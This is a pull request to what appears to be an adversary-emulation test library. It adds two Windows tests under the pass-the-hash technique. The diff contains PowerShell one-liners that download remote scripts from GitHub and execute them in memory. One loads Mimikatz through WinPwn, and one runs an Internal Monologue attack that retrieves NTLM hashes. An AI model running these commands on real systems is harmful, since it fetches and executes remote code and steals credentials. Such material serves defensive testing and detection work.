### PR TITLE
Update T1550.002.yaml

### DIFF
--- a/atomics/T1550.002/T1550.002.yaml
+++ b/atomics/T1550.002/T1550.002.yaml
@@ -112,3 +112,22 @@ atomic_tests:
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       IEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command}
     name: powershell
+- name: WinPwn - Reflectively load Mimik@tz into memory
+  description: Reflectively load Mimik@tz into memory technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      mimiload -consoleoutput -noninteractive
+    name: powershell
+- name: WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS
+  description: PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Internalmonologue.ps1')
+      Invoke-Internalmonologue -command "-Downgrade true -impersonate true -restore true"
+    name: powershell


### PR DESCRIPTION
WinPwn - Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS! 
WinPwn - Reflectively load Mimik@tz into memory!

**Details:**
Windows 10 

**Testing:**
<!-- Note any testing done, local or automated here. -->

**Associated Issues:**
<!-- Please link any issues that this pull request impacts or fixes. -->